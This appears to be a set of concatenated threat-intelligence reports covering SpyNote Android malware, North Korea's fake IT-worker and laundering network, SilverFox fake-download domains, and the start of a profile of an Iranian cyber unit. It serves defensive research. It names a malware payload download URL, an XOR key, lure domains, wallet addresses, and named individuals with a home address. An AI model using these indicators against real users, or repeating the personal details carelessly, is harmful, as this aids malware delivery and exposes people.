3. C2 Logic Establishes Connection: The dynamically loaded DEX file contains the code to build the WebSocket URL for the C2 server.

In previously reported configurations, the C2s were hardcoded directly in the functions for sending traffic. In recent samples, they use control flow obfuscation and identifier obfuscation through random variations of o, O, and 0 for all names in an attempt to make it difficult to understand the program’s logic through static analysis.

Sample identifier obfuscation in a loaded DEX file:

4. C2 Domain Selection Logic: A utility method selects a domain from a predefined list, making the malware more resilient.

5. Hardcoded C2 Domain List: The final destination is a simple class that acts as a container for the hardcoded C2 domains.

Threat Actor Analysis

The threat actor distributing SpyNote malware exhibits persistence and limited technical adaptability. They consistently use deceptive Google Play Store clones to lure victims, a social engineering tactic that remains central to their operations. Despite previous exposure, their infrastructure remains confined to two primary IP addresses, showing a restricted capacity for diversification, though they do rotate specific IP resolutions. The anti-analysis techniques used in their APK droppers are relatively simple, employing basic obfuscation and dynamic payload decryption to protect the SpyNote payload.

The APK filenames suggest the spoofed brands or applications fall into these categories:

• Social & Dating Apps: iHappy, CamSoda, Kismia, yome, TmmTmm
• Gaming Apps: 8 Ball Pool, Block Blast
• General Utility/Productivity Apps: Chrome, meus arquivos 2025, Beauty, Faísca Inicial, Compras Online, LoveVideo, GlamLive, Holding Hands

This actor is suspected of broadly targeting consumers with lures mimicking popular applications, including those related to fashion, social networking, and general utilities, as well as ubiquitous apps like Chrome and Zoom. This wide net, coupled with the surveillance and data exfiltration capabilities of SpyNote, strongly suggests a financially motivated objective. While the delivery code contains Chinese language comments, the specific attribution for this persistent and opportunistic threat actor remains unknown.

Conclusion

This report details a persistent SpyNote malware campaign by an actor relying on deceptive Google Play Store clones for delivery. Key technique changes were the dynamic payload decryption and DEX element injection used by the initial dropper, which conceals SpyNote’s core functions and hijacks app behavior, and the control flow and identifier obfuscation applied to the C2 logic to hinder static analysis. The actor’s limited infrastructure adaptability and broad consumer targeting for financial gain highlight their opportunistic yet effective approach. This persistent activity underscores the ongoing threat of mobile RATs and the need for continuous vigilance against social engineering tactics, even from actors with limited technical sophistication.

Security Recommendations

To better protect consumers from threats like SpyNote, key players in the security ecosystem can enhance their defenses:

Browser Developers: Consider strengthening built-in malicious site warnings to automatically flag and block access to deceptive download pages such as fake Google Play Store sites. This helps users avoid suspicious sites entirely.

Android Antivirus Providers and Mobile OS Developers: Focus on advancing automated analysis of app downloads to quickly detect and prevent the installation of harmful software, even when it tries to hide. This provides a crucial layer of defense directly on the device.

Mobile VPN Providers: Explore integrating network-level security features that automatically filter out or alert to connections to known malicious servers. This adds another protective barrier, stopping threats before they can reach the user’s device.

IOCs

Malware Delivery

‍

Droppers

‍

‍SpyNote

‍

Command & Control

‍

Shodan Hunting Queries

Tip: Look for fake Google Play Store sites or suspicious iframe JavaScript sources for file downloads.

‍

SpyNote Mobile ATT&CK Matrix

Reference: https://attack.mitre.org/matrices/mobile/

‍

Introduction

Over the last five years, the Democratic People’s Republic of Korea (DPRK) has transitioned from smash-and-grab cryptocurrency raids to a more covert, scalable model of economic warfare: the global deployment of disguised IT workers.

Orchestrated by elite units under the Reconnaissance General Bureau (RGB), these operatives acquire remote employment with U.S. and international tech firms using forged or stolen identities. Once embedded, they receive crypto-based salaries and redirect those earnings into the DPRK’s economy via a network of laundering nodes, front companies, and domain infrastructure.

This report maps the entire ecosystem: key actors, GitHub aliases, laundering flows, shell companies, fake domains, platform infiltration, wallet infrastructure, and global enablers. We also examine the national security implications of the scheme, as well as how lax corporate hiring standards allowed North Korean operatives not just to get paid, but to access critical infrastructure, intellectual property, and production code.

Key Actors and Their Roles

Central Command: Song Kum Hyok & the Andariel Subgroup

At the operational core of North Korea’s disguised IT labor campaign stands Song Kum Hyok, a senior officer within the Andariel subgroup, one of the Reconnaissance General Bureau’s (RGB) elite cyber units. The RGB, North Korea’s main foreign intelligence service, directs both offensive cyber operations and covert economic warfare efforts, and Song’s role straddles both.

Hyok has long been involved in digital identity manipulation, remote access infrastructure, and dark market employment pipelines. Intelligence archives suggest that before assuming his current role, he was linked to multiple Andariel operations involving ransomware staging servers and social engineering against South Korean financial firms.

In the IT worker scheme, Song Kum Hyok is the strategic coordinator of identity theft and resume forgery, enabling North Korean engineers to present themselves as legitimate U.S. based freelancers. North Korea’s decentralized cyber-labor offensive hinges on stolen and curated identities—complete with names like Joshua Palmer, Sandy Nguyen, and GitHub handles such as devmad119 and sujitb2114. These identities often include verified Know Your Customer (KYC) data: Social Security numbers, clean background checks, and even Green Card scans, sourced from data breaches or underground markets.

Operatives use these identity packages to craft professional-grade resumes and LinkedIn profiles, frequently enhanced with AI-generated content and real or fabricated employment histories. They apply to remote jobs on freelancing platforms such as Upwork, Ureed, or the now-defunct Nabbesh, exploiting weak or automated verification and HR onboarding systems in U.S. companies.

Once hired, they gain access to internal tools and sensitive systems: GitHub repositories, Slack channels, financial dashboards, CI/CD pipelines, and privileged cloud infrastructure. From this vantage point, they can siphon intellectual property, embed backdoors, and surveill company operations—all while appearing to be legitimate remote hires. This seamless path, from stolen identity to embedded insider—is the operational backbone of Pyongyang’s covert cyber-espionage labor force.

Once North Korean operatives are embedded in foreign companies, their wages, often paid in cryptocurrencies as well as financial transfers through banks are routed through a meticulously layered laundering process. The first stop is typically a GitHub-linked wallet address associated with the operative’s fake identity (e.g., aliases like “devmad119” or “Joshua Palmer”). From there, the funds may flow into front companies such as Hopana-Tech LLC which act as legitimate salary processors. To further obscure the money trail, salaries are split across multiple wallets using automated smart contracts, a tactic designed to fragment and anonymize the source of funds. Finally, the dispersed assets are aggregated and cashed out via over-the-counter (OTC) crypto brokers based in Russia, the UAE, and China, jurisdictions known for permissive financial enforcement. This end-to-end pipeline creates a resilient and stealthy mechanism for the DPRK to funnel hard currency back into its economy while bypassing international sanctions.

Hyok’s innovation lies in combining AI-generated job profiles with pre-cleared identity data and military operational discipline. Under his supervision, the scheme has moved from ad hoc fraud to a scalable, persistent economic attack model yielding millions of dollars annually for North Korea’s weapons programs while hiding in plain sight inside the legitimate global economy.

U.S. Frontman: Kejia Wang

From a quiet address in Edison, New Jersey, Kejia Wang, also known as Tony Wang, ran one of the most critical nodes in North Korea’s international cyber-laundering apparatus. His residence at 65 Idlewild Road wasn’t just a suburban home; it was the physical anchor for a web of front companies, remote device hubs, and disguised income laundering pipelines that allowed DPRK IT workers to embed themselves inside U.S. companies.

Wang operated under the radar, founding multiple businesses that appeared legitimate on paper but functioned primarily as pass-through entities for laundering salaries earned under false identities. These businesses included tech fronts, aviation firms, and even a massage parlor, each playing a role in the deception.

The most visible of these fronts was the Highland Park 215 Spa, located just a few miles from Wang’s listed residence. Officially a wellness spa, it appears to have functioned as a cash-out hub for crypto proceeds tied to North Korean developers. Its web presence was thin and reviews inconsistent, offering more red flags than relaxation.

Wang’s activities extended far beyond shell paperwork. He physically received laptops sent by U.S. companies hiring remote workers and connected them to internet-facing KVM switches. These switches allowed DPRK operatives, posing under names like “Joshua Palmer” or GitHub aliases like “devmad119”, to work as though they were based in the U.S. He also installed unauthorized software, managed credentials, and monitored access on behalf of the regime.

To keep the deception watertight, Wang opened corporate bank accounts, created digital presences for the fake companies, and maintained financial rails through platforms like Wise, Zelle, and Payoneer. His shell entities even issued IRS tax forms using stolen identity data, giving employers the impression that their freelance hires were tax-compliant U.S. residents.

Wang coordinated with a global network of co-conspirators, including Zhenxing Wang and Jing Bin Huang in China, Mengting Liu in Taiwan, and crypto brokers in the UAE and Russia. These connections formed the infrastructure that allowed funds from unsuspecting U.S. firms, including those in the defense sector, to end up in wallets controlled by the North Korean regime.

Court filings in DOJ case 25-cr-10274 paint a damning picture: Kejia Wang was not only aware that the workers were North Korean nationals, but also actively facilitated the laundering of more than $5 million in wages tied to fraud, of which at least $3 million resulted in direct corporate losses.

From his role as a logistics manager to a shell company architect, Wang helped build a shadow economy inside the legitimate global tech labor force, an economy designed to fund weapons development, evade sanctions, and penetrate sensitive digital infrastructure with ease.

Laptop Farms and Stolen Identities: Christina Chapman

Laptop farms function as remote access deception hubs, allowing foreign operatives to convincingly impersonate U.S.based employees. In this scheme, the perpetrators acquire and configure laptops sent by U.S. companies to individuals they believe are legitimate remote hires. These devices are logged into and maintained from U.S. soil, typically through physical setups in homes or small offices, so that all network traffic and telemetry appear domestic. The key to this illusion is identity theft. Recently, the DOJ indicted Christina Chapman, a facilitator in Arizona, who ran “Laptop Farms”. Once the hiring process was complete, victim companies would ship work laptops and grant access to sensitive systems, unaware that the real end users were North Korean nationals abroad. Chapman’s role was not only to receive and activate these laptops but to maintain them for continuous remote access, ensuring that DPRK operatives could stay invisible behind American identities.

Platform Penetration & Global Expansion

As enforcement tightened on global freelancing hubs such as Upwork, Fiverr, and Freelancer.com, North Korean IT operatives expanded their focus to less-regulated, regionally focused gig platforms, particularly in the Middle East and North Africa (MENA). While major global platforms like Upwork and Freelancer still see DPRK IT worker recruitment, intelligence gathered throughout 2024 and 2025 indicates a broader strategy to infiltrate various online platforms. These platforms became attractive to DPRK-aligned actors due to their comparatively lenient onboarding processes, minimal identity verification, and weak vetting practices, which allow the actors to bypass employment verification controls.  

This expansion coincided with observed DPRK tactics documented by Microsoft Threat Intelligence and Google Cloud’s Mandiant division , which reported the use of KVM switch setups , stolen identity kits , and remote desktop software to simulate domestic employment in a given jurisdiction—even when the worker operated from DPRK or China. Newer tactics include the use of synthetic voices for video interviews , AI-generated profile images , and automated deployment of identity documents that pass lightweight vetting procedures common to less-regulated platforms.  

Payment pipelines also evolved. Payments are often facilitated through virtual currency, as well as services like TransferWise and Payoneer, implying a preference for systems with limited oversight. In 2025, DPRK operatives received payment through disbursement services into crypto wallets or offshore accounts, routing earnings through UAE-based infrastructure. However, the provided research does not directly corroborate specific incidents such as a “Ureed-based hire posing as a Syrian frontend engineer working for a UAE fintech company” or mobile application code delivered via “Nabbesh” by a user claiming to be Palestinian with telemetry traced to Vladivostok, Russia. However, the use of telemetry to detect Russian-linked infrastructure associated with DPRK activity is confirmed.  

This redirection to under-monitored platforms reflects the regime’s operational flexibility. Instead of abandoning freelance infiltration altogether, Pyongyang expanded its reach into low-friction digital labor markets with lower regulatory visibility. This expansion not only preserved a steady stream of foreign currency for the regime , but it also increased DPRK’s reach into sectors and geographies beyond traditional U.S.-centric targets. It is not simply opportunistic—it is part of a deliberate, adaptive campaign of economic espionage masked as remote software development.  

Shell Company Infrastructure

The DPRK IT labor operation was propped up by a web of shell companies that each played a distinct, carefully engineered role in laundering salaries, spoofing employment legitimacy, and obfuscating the true identities of North Korean operatives. At the core of this infrastructure was Kejia Wang, a New Jersey-based facilitator who established multiple legal entities across the U.S. to mask the flow of illicit wages. Hopana-Tech LLC served as a primary payroll conduit, accepting salary payments from victim companies under the guise of a legitimate staffing agency. Tony WKJ LLC was used to receive and deploy laptops to DPRK operatives, while also functioning as a salary masking layer. Independent Lab LLC provided the technical underpinnings, including blockchain API relays and crypto wallet infrastructure to route funds out of the U.S. financial system. Highland Park 215 Spa LLC, ostensibly operating under the cover of a massage parlor in New Jersey, likely acted as a cash-out point for laundering physical funds.

Wang also operated Northstar Leadership Inc., which produced fabricated resumes and managed identity paperwork, essential for onboarding DPRK operatives to hiring platforms. Through Capella Aviation LLC, Wang and co-registrant Liwen Huang routed wire transfers through Hong Kong and mainland China, creating a cross-border financial bridge. On the Russian front, Gayk Asatryan used Asatryan LLC and Fortuna LLC to legally host 80 DPRK workers, legitimizing their presence under 10-year employment contracts signed with North Korean trading firms.

These entities were not isolated -they were interconnected through shared addresses such as 65 Idlewild Road, overlapping registration details, and reused bank accounts and crypto wallets. Together, they formed a sophisticated scaffolding that gave the illusion of legitimate employment and enterprise, while operating as the foundation for one of the most complex sanctions-evasion schemes tied to DPRK’s Reconnaissance General Bureau.

DPRK Currency Transfers Via Banking

Kejia Wang, operating from New Jersey, functioned as the financial cornerstone of the DPRK’s U.S.-based laundering scheme. Through front companies like Hopana Tech LLC, Tony WKJ LLC, and Independent Lab LLC, he established business and money transfer accounts used to receive salary payments from U.S. companies unwittingly employing North Korean IT workers under false identities.

At Hopana Tech, Wang opened a U.S. bank account that took in over $464,000 from victim firms between January 2022 and April 2024. These funds were rerouted to overseas co-conspirators such as Jing Bin Huang and a network of Chinese shell entities (e.g., Shenyang Xiwang, Deep Tech, Aolien) via Bank of China and Standard Chartered (HK).

Simultaneously, Tony WKJ LLC received more than $1.6 million through a U.S. money transfer service (MTS-2), which Wang distributed to accounts linked to Enchia Liu, Food Yard Trading (Dubai), and Shenyang Sun-Lotus Tech. He personally siphoned $218,000 into his own U.S. checking account and another $412,000 to his personal MTS account. Between 2022 and 2023, he also received $237,000 in salary deposits into that same personal account, then forwarded $208,000 across 43 transfers to co-conspirators Huang and Tong Yuze.

Wang further disguised laptop handling and device access fees as routine payments labeled “CA laptops” and “NY laptops,” totaling over $55,000 sent to two U.S.-based facilitators.

Lastly, using MTS-3, Wang falsely registered Tony WKJ as a “VC-backed software firm” and received $352,949 from victim companies. When flagged by MTS staff, Wang lied about a DPRK worker under the alias “Wandee C.,” claiming he was a subcontracted developer.

In total, these financial maneuvers moved millions through U.S. infrastructure to overseas nodes, enabling DPRK operatives to mask their identities and launder salaries under the guise of legitimate tech consulting.

Crypto Payment Flows & Wallet Infrastructure

The laundering of salaries earned by North Korean IT operatives followed a structured, multi-phase pipeline designed to minimize traceability and regulatory exposure. In Phase 1: Salary Receipt, payments from unsuspecting U.S. and international companies were sent either to front companies, such as Hopana-Tech LLC and Independent Lab LLC, or directly to wallet addresses listed on the operatives’ GitHub profiles. These companies believed they were paying legitimate U.S.-based contractors, unaware that the workers were remote operatives in North Korea using stolen or forged identities.

Phase 2: Obfuscation began as soon as payments arrived. Smart contracts were employed to automatically split the incoming funds across clusters of Ethereum or TRON wallets. This fragmentation technique, similar to those used in ransomware operations, obscured the origin of the funds and made tracking the complete financial trail more difficult. Each tranche was redirected through different wallets, reducing the ability of investigators to correlate input/output flows with a single identity or origin point.

In Phase 3: Conversion, the obfuscated crypto was aggregated and funneled through over-the-counter (OTC) brokers based in Russia, the United Arab Emirates, and Hong Kong. These brokers specialize in converting large sums of stablecoins into fiat or alternative cryptocurrencies while avoiding compliance triggers. Eventually, the cleaned funds were consolidated into wallets under DPRK control, some of which have since been blocklisted by platforms like Tether for links to illicit activity and sanctions violations. This seamless pipeline allowed the DPRK to convert stolen or fraudulently earned wages into usable capital for the regime’s strategic programs, including its weapons development efforts.

DPRK IT Worker Cluster Wallet & Identity Mapping

Eight fake identities represent a sophisticated and evolving strategy by the DPRK’s IT worker apparatus to not only infiltrate the U.S. based companies but to systematically exfiltrate salary payments into laundering pipelines that support North Korea’s sanctioned economy. Each alias, crafted with care and strategic foresight, was tied to a complex infrastructure of forged documents, crypto wallets, and online developer personas, all designed to evade detection by employers, banks, and regulators.

These aliases were not random. Many were modeled on plausible names common in the U.S., Canada, or Southeast Asia, making them more likely to pass identity verification or “soft KYC” checks on freelancing platforms and internal HR systems. They were often accompanied by polished Linkedin profiles, active GitHub repositories, and consistent communication habits, all of which contributed to the illusion of a legitimate remote developer.

Behind the scenes, each identity was directly linked to salary laundering flows. For instance, Andy Bell, Benjamin Nguyen, and Sandy Nguyen used ETH-based wallet addresses, including vanity ENS domains like bbshark[.]eth and gsofter[.]eth, to receive payments from U.S. firms under the guise of contract work. These addresses were often listed on their GitHub accounts as “payment preferred to…” links, allowing unsuspecting employers or payroll processors to initiate transfers.

In many cases, funds were first routed to these GitHub-linked wallets, then automatically or manually split using smart contracts across secondary addresses. From there, the payments were funneled to consolidation wallets controlled by DPRK facilitators or OTC brokers in Russia, China, or the UAE. For example, funds from wallets tied to Josh Thomas and Muhammad Abdullah were traced via ZachXBT and TRM Labs to known laundering hubs tied to sanctioned North Korean operators. (*ZachXBT is a self-taught, pseudonymous blockchain investigator who has gained global recognition for tracking fraudulent crypto transactions, hacks, rug pulls, and state-linked laundering schemes.)

The fake geographic locations assigned to these aliases were deliberately chosen to align with employment demand and reduce suspicion, such as Texas, California, Toronto, and Michigan, regions known for tech industry presence. These locations also matched VPN exit nodes and remote access IP ranges used to simulate U.S.-based developer activity during work hours.

In total, these eight identities were tied to at least 12 different U.S. and international projects. They helped siphon hundreds of thousands in salaries, while embedding DPRK-linked code contributors into the core of web3 startups, fintech platforms, and even infrastructure projects. Their exposure now offers critical insight into the DPRK’s strategy: weaponizing remote work, exploiting global labor gaps, and turning open-source ecosystems into vectors of economic subversion.

Associated Consolidation Wallets

ZachXBT reports that all above identities and payment addresses lead to two known consolidation wallets:

• 0x58225fed0714e5b9b235642eba7dae3714090a2d
  
• 0xa7f9555c34626eb81b64774356a40ca1a6a794ca
  

These wallets serve as hubs in laundering pathways, taking in payments from U.S. firms and redistributing to DPRK-controlled endpoints via OTC brokers and blacklisted channels. These are frequently referenced in TRM Labs and Treasury forfeiture filings.

Global Network of Enablers

The DPRK’s IT worker laundering network was supported by a multinational cast of facilitators operating across five regions, each providing critical functions that enabled the scheme to scale globally. In the United States, Kejia Wang and Zhenxing “Danny” Wang served as the domestic linchpins, establishing shell companies like Hopana-Tech LLC and Independent Lab LLC, receiving company-issued laptops, and enabling remote access for DPRK operatives via KVM switches. In China, actors such as Jing Bin Huang, Tong Yuze, and Zhenbang Zhou were responsible for setting up domain infrastructure, fabricating identity records, and acting as intermediaries in the salary flow chain. Operating from the United Arab Emirates, Yongzhe Xu and Ziyou Yuan handled the setup of financial accounts and cryptocurrency wallets that served as routing points for laundered funds. Meanwhile, in Taiwan, Mengting Liu and Enchia Liu were tasked with salary account management and crypto-to-cash withdrawal, helping to finalize the money laundering cycle. In Russia, Gayk Asatryan took on a more formal role, entering into 10-year labor agreements with DPRK trading entities and providing legal cover through his companies Asatryan LLC and Fortuna LLC for the long-term hosting of North Korean IT workers. Together, these individuals formed the logistical and financial scaffolding behind one of the DPRK’s most successful sanctions evasion operations to date.

Domains Used to Mask DPRK Labor Pipelines

While the physical infrastructure of DPRK’s cyber-labor operation is anchored in shell companies and banking channels, its digital front is built on a deceptively simple architecture: domain registrations and simple, one-layer-deep web sites. Four key domains, hopanatech[.]com, tonywangtech.com, wkjllc[.]com, and inditechlab[.]com, emerged as critical components of the laundering and deception ecosystem.

All four were registered through NameCheap, a domain registrar frequently exploited by threat actors for its lenient Know-Your-Customer (KYC) policies. These domains aligned closely with the shell companies documented in the July 2025 indictment of Kejia Wang (aka Tony Wang).

• hopanatech[.]com: Used as a façade for the employer-of-record shell “Hopana Tech LLC.” This site served as a point of contact and “employment verification” front, meant to convince firms that IT workers were U.S.-based.
• tonywangtech[.]com and wkjllc.com: Variations on the Tony WKJ LLC shell, these domains were used to generate email aliases and submit resumes under false identities. They helped DPRK contractors pass due diligence by appearing affiliated with a legitimate tech firm.
• inditechlab[.]com: Tied to Independent Lab LLC, a shell involved in crypto infrastructure. The domain may have also hosted webhooks and API interfaces used in TRON-based laundering flows.

Despite their differing branding, these domains shared clear indicators of clustering:

• Similar registrar info and name servers
• Absence of advanced metadata like Google Analytics or embedded tracking (indicating high OPSEC awareness)
• WHOIS privacy enabled
• Associated email accounts and DNS infrastructure linked to Wang or his co-conspirators

These domains were not just placeholders. They were operationally active, used in job applications, HR communications, resume verification, and even crypto billing. In short, they functioned as front-facing digital camouflage for a covert state-aligned economic espionage program.

Strategic and Financial Impact

By the first half of 2025, North Korea’s covert IT labor scheme had evolved into a robust revenue-generating apparatus capable of siphoning millions from the global economy with alarming precision. An estimated $17 million in salary payments was funneled through shell companies and direct crypto wallets tied to DPRK operatives posing as freelance developers. It is also cited that the total for the scheme globally netted between $250 to $600 million altogether. These payments came from hundreds of U.S. companies, including fintech startups, SaaS vendors, blockchain firms, and even defense contractors, who unknowingly onboarded North Korean nationals through falsified resumes and forged identity documents. In June 2025, U.S. authorities seized $7.7 million in cryptocurrency assets connected to the scheme, targeting wallets tied to aliases like “devmad119” and “Joshua Palmer.” Yet this represents just a fraction of the broader threat: over $1.6 billion in global cryptocurrency losses were attributed to DPRK-linked actors in the same time period, with 70% directly traced to operations blending employment fraud, social engineering, and codebase compromise. Far beyond financial theft, this scheme granted North Korean operatives persistent system access, enabling the injection of malicious logic, exfiltration of proprietary code, and creation of long-term backdoors across critical sectors.

Insider Threats: Espionage by Employment

North Korean IT operatives, posing as legitimate remote developers, evolved from mere economic infiltrators to full-fledged insider threats. Once embedded within U.S. and foreign tech firms, these operatives obtained privileged access to critical assets, including GitHub repositories, CI/CD pipelines (like Jenkins and GitLab), and cloud configuration files across AWS, Azure, and GCP. With this level of access, they would be able to insert stealthy “sleeper” functions, delayed or dormant code designed to activate later, as well as data exfiltration logic disguised within standard requests, such as base64-encoded POST or GET calls.

To date, no official disclosures from the government or private sector have confirmed that such actions have occurred. However, given that these nation-state adversaries were embedded as insider threats, it is reasonable to assess that once they gained access to sensitive networks and digital assets, they likely exploited opportunities that extended beyond financial fraud. The potential for strategic espionage, leveraging their privileged access for intelligence collection or cyber sabotage, must be considered a probable scenario.

Threat Assessment

The infiltration of DPRK IT workers into Western firms represents one of the most sophisticated and insidious insider threat campaigns in recent memory. Unlike external cyberattacks that can be blocked at the perimeter, these operatives gained trusted persistent access inside corporate networks by posing as vetted remote employees. Once hired, often via stolen, background-verified U.S. identities, they were embedded into critical roles such as backend development, cloud configuration, CI/CD pipeline maintenance, and DevOps infrastructure. This level of access granted them entry into source code repositories, production environments, encryption logic, and proprietary APIs, allowing for potential IP theft, backdoor insertion, credential harvesting, and pre-positioning for future attacks.

This threat was magnified by a widespread failure among companies to implement robust asset management, access logging, and behavioral anomaly detection. In many cases, organizations lacked visibility into who exactly was accessing which systems, when, and from where. The use of remote KVM switches, proxy VPNs, and U.S.-based cloud endpoints enabled DPRK operatives to blend in with legitimate employee traffic, bypassing geo-fencing or basic endpoint monitoring. Some firms failed to enforce multi-factor authentication, revoke GitHub deploy keys upon contractor termination, or monitor suspicious API activity from “internal” users. Additionally, lax onboarding processes and over-reliance on third-party background check platforms meant many identities went unverified or unchecked.

To counter these threats, companies must enforce zero-trust security models, where access is continuously evaluated based on device health, location, and behavioral norms. Automated asset inventories, real-time session monitoring, and privileged access management (PAM) should be standard practice. Every contractor should have narrowly scoped, time-limited access tied to individual credentials, with full audit trails and immediate revocation mechanisms. Organizations must also reevaluate how they vet remote talent, introducing biometric verification, live interviews, and cross-checks with employment databases to prevent identity fraud. Failure to do so risks granting hostile nation-state actors like the DPRK the keys to their most valuable digital assets, without ever breaching a firewall.

Conclusion

The breaking up of the DPRK IT workers exploit is a wake up call for corporations around the world. The aphorism of “The insider threat is the biggest threat” in the infosec space rings true here with a clarion call. So far, the information that has come out (and continues to be researched) seems to indicate that the U.S. was not the only target of the DPRK activities. That said, it is important that corporations and organizations understand the aphorism above, and do all they can to ensure such insider attacks are much harder to carry out.

It is also important that, within the new paradigm of AI, interviews, vetting, and generally, everything carried out during the interview and vetting process, be backstopped to ensure authentic individuals are being hired, and not assets of a foreign power, or for that matter, other criminal actors. This new landscape will only get more complex, and as we move forward into this brave new world, expect there to be other exploits like these that could render your operations into extreme response circumstances.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

‍

This report details an ongoing campaign by an actor operating primarily during Chinese time zone working hours, targeting Chinese-speaking individuals and entities within and outside China. Since approximately June 2023, the actor has created more than 2,800 domains for malware delivery. The actor's methods and malware, largely unchanged since June 2023, primarily deliver Windows-specific malware through fake application download sites and fake update prompts in various spoofed login pages, marketing apps, business sales apps, and cryptocurrency related apps. 

Following previous reports, the actor made notable operational changes including the addition of 

• Anti-automation and browser emulation code
• Reduction in site tracker services
• Increased server distribution for sparser domain resolutions per IP address
• More discreet registration details

As of June 2025, 266 of the over 850 identified domains since December 2024 were actively distributing malware.

For comprehensive details, refer to the two prior reports linked below:

Part 1: https://dti.domaintools.com/chinese-malware-delivery-websites/ 

Part 2: https://dti.domaintools.com/chinese-malware-delivery-domains-part-ii-data-collection/ 

A Sampling of Their Malware Delivery Websites

‍

Fake Gmail Login

The `googeyxvot[.]top` domain uses anti-automation and browser emulation checks, and any input on its fake login page triggers a deceptive browser incompatibility error, prompting a malicious update download. Multiple JavaScript files are employed to obfuscate the download URL.

A malicious .zip file from `googeyxvot[.]top` delivers an .msi installer. This installer contains multiple .jpg named files and two executables, `svchost.13.exe` and `flashcenter_pl_xr_rb_165892.19.exe`. `svchost.13.exe` acts as a downloader, fetching a file from `https://ffsup-s42.oduuu[.]com/uploads%2F4398%2F2025%2F06%2F617.txt`. The downloaded file uses a shellcode decoder loop, decrypts its content with XOR key "0x25", and executes an embedded PE file.

‍

Fake Alipay Checkout

The domain displays a fake popup stating it cannot operate currently due to the use of abnormal operation mode. The buttons Get Help Now and Cancel are displayed, which prompt a download of a malicious file. 

yeepays[.]xyz

An imported JavaScript file defines the download path

“yeepays[.]xyz/assets/js/external_load.js”

The filename is defined in another imported JavaScript file

“yeepays[.]xyz/assets/download/filename.js”

The download URL for the malicious file then becomes: 

‍

Fake Cryptocurrency Sites

coinbaw[.]vip

Clicking most of the interactive buttons redirects to a fake sign-in page for a fake crypto exchange named “CoinBaw”, which likely attempts to spoof as CoinBase.

Registration Details

Mapping over 2,800 of the actor’s registered domains since June 2024, we observed similar trends in timing.

Domain Registrations Create Date

Domain Resolutions First Seen

Comparing the registration creation times for domains and their respective first seen resolutions from DNS lookups we can approximate possible human working times from infrastructure acquisition and operationalization commonalities. Though both of which can be largely automated and consequently the timing of either event can be largely unreliable, they may offer some valuable insights particularly with regard to potential prevalence in targeted regions.

We observed a common distribution of both domain acquisition and potential operationalization across times. Operationalization in this context is essentially the distinction between the registration of the domains and associated infrastructure and then making use of it in some operational way. In this case, to deliver malware via spoofed application download pages. The majority of both are seen to occur during normal Chinese working hours. Notably, the volume of first seen resolutions of those domains also appear during normal Chinese working hours.

Changes In Operations

The actor has implemented several changes in their operational tactics. This includes the addition of rudimentary anti-automation and browser emulation code, designed to hinder site scanners from effectively retrieving website content. Furthermore, there has been a reduction in the use of site tracker services such as Baidu, Gtag, and Facebook. The actor has also increased the number of servers used to spread domain resolution more widely, and adopted more discreet registration details to obscure uniquely identifiable information.

Conclusion

The "SilverFox" actor continues to demonstrate a high degree of persistence and scale in their malware delivery operations, primarily targeting Chinese-speaking individuals and entities globally with Windows-specific malware. Their campaign, ongoing since at least June 2023, leverages over 2,800 created domains, with 266 remaining active since December 2024, highlighting their sustained infrastructure and reliability improvements. The consistent operational timing across all hours with high influxes during Chinese working hours in addition to other factors suggests a combination of automated and likely human-driven approach to their activities.

While the actor's ultimate motivations remain somewhat uncertain, their tactics strongly suggest financially motivated and opportunistic objectives. We suspect their primary goals include credential and financial theft, and potentially access brokering. Furthermore, the observed targeting of individuals engaged in sales and marketing, particularly those outside China but involved in business prospects within the region and possessing Chinese language skills, points to a potential secondary motivation to exploit specific professional networks for further gains.

Modern browsers like Chrome and Edge provide a critical, multi-layered defense against malware from fake download sites. They use integrated security systems—Google Safe Browsing and Microsoft Defender SmartScreen—to proactively block malicious websites before they can be accessed. At the point of download, these browsers analyze files for risk by checking their reputation and digital signatures, and provide clear, direct warnings to prevent users from accidentally running dangerous software. 

While current detection rates of SilverFox payloads show limitations, it's crucial to recognize that browser security is a constantly evolving battleground. Browser developers are continually refining their defenses, integrating more advanced AI and machine learning models to identify and block novel threats in real-time. This ongoing technological advancement, however, highlights a fundamental truth: the most sophisticated digital warnings are ultimately supplementary to an aware user.

To counter the persistent threat posed by SilverFox, organizations and individuals should prioritize the following security measures:

• Elevate User Awareness: Conduct phishing simulations and training, and emphasize secure software acquisition from official sources.
• Strengthen Email and Web Gateway Security: Implement ATP, integrate threat intelligence feeds for URL filtering and domain reputation, and employ DNS filtering.
• Enhance Endpoint Security and Response: Deploy NGAV/EDR across Windows endpoints and ensure automated patch management.
• Implement Network Monitoring and Segmentation: Analyze network traffic for indicators of compromise and segment networks to limit lateral movement.
• Prioritize Identity and Access Management: Enforce Multi-Factor Authentication (MFA) for all user accounts.

IOCs

Domains, file URls, and hashes can be found on our Github.

A Profile of Iran’s Covert Cyber Strike Unit and Its Psychological Warfare Extension

Executive Summary

Intelligence Group 13, embedded within the Shahid Kaveh Cyber Group, represents one of the most operationally aggressive and ideologically fortified units within the Islamic Revolutionary Guard Corps (IRGC) cyber arsenal. Positioned at the confluence of tactical cyber-espionage, industrial sabotage, and psychological warfare, the group is uniquely equipped to respond to geopolitical escalations,particularly in light of the recent U.S. airstrikes targeting Iranian nuclear facilities, which have significantly heightened the risk of asymmetric retaliation.

As Iran faces intensified pressure and public calls for reprisal, it is assessed that it is increasingly likely that IRGC cyber divisions will be leveraged for retaliatory digital operations. Intelligence Group 13, already known for its history of intrusions into critical infrastructure, including U.S. water systems and Israeli control networks, now finds itself in a strategic posture to deliver retributive action through cyberspace. Whether through direct disruption, pre-positioned malware activation, or narrative defacement and psychological intimidation, the group's capabilities make it a prime tool for hybrid response, combining deniable technical aggression with symbolic messaging designed to project defiance and psychological impact.

Functioning under the umbrella of the IRGC’s broader cyber command, which includes the Electronic Warfare and Cyber Defense Organization (EWCD), the Intelligence Organization (IO), and Quds Force forces like Unit 300, Intelligence Group 13 is not an isolated cell but part of a highly coordinated ecosystem. Its online presence is reinforced by propaganda fronts such as CyberAveng3rs, a media arm that issues threats, amplifies operational claims, and disseminates defacement content through platforms like Telegram and Instagram. Together, these assets form a multi-domain influence architecture that allows Iran to execute cyber retaliation while shaping the narrative battlefield.

This report maps the hierarchy of Intelligence Group 13 within the IRGC, profiles its leadership, outlines its tradecraft and ideological underpinnings, and assesses the increased likelihood of its deployment in near-term retaliatory cyber operations.

Intelligence Team (Group) 13 تیم اطلاعاتی ۱۳

